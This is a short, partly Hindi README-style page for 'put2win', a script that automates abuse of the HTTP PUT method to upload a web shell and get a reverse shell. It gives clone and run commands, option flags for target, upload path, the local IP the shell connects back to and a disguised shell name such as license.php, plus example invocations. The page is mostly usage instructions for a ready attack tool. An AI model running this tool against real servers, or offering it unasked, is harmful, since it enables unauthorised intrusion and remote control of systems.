
PUT HTTP विधि के शोषण को स्वचालित कर शेल प्राप्त करने की स्क्रिप्ट
PUT HTTP विधि के दोहन को स्वचालित करने और शेल प्राप्त करने के लिए स्क्रिप्ट।
git clone https://github.com/sysdevploit/put2win
cd put2win
chmod +x put2win.sh
Script to automate PUT HTTP method exploitation to get shell.
Options:
-t TARGET Target URL/IP (e.g. 192.168.1.10)
-p PORT Target PORT (e.g. 8080)
-u URL PATH Path to save the shell (e.g. /uploads)
-l LOCAL IP IP where the shell will connect (e.g. 192.168.1.5)
-s SHELL NAME Shell name (e.g. license.php)
Examples of use:
- bash put2win.sh -t 192.168.1.80 -l 192.168.1.10 -s readme.php
- bash put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10
टेलीग्राम: @devploit
ट्विटर: @devploit